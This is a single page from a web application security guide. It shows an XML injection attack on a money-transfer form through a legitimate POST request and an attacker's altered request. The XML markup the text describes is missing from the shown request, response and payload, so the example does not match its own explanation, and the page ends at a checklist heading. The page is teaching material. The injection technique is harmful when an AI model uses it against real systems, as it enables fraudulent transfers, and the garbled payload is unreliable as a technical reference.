Web application security - the fast guide 1.1 | Page 150
Chapter 7 - Attack execution (3)
P a g e | 150
the legitimate request will include the following:
POST /test/12/Default.aspx HTTP/1.0
Host: victim.com
Content-Length: 65
FromAccount=18281008&Amount=1430&ToAccount=08447656&Submit=Sub
mit
The related response might be something like:
182810081430False08447656
Now the attacker can simply include a parameter that contains a closer for a
specific tag and alter the entered parameters
POST /test/12/Default.aspx HTTP/1.0
Host: victim.com
Content-Length: 125
FromAccount=18281008&Amount=1430True
08447656&Submit=Submit
In the listing above the attacker closed the Amount tag and added the required
values adding the closure tab toAccount in a comment thus preserving XML
validity.
7.10 Attack Checklist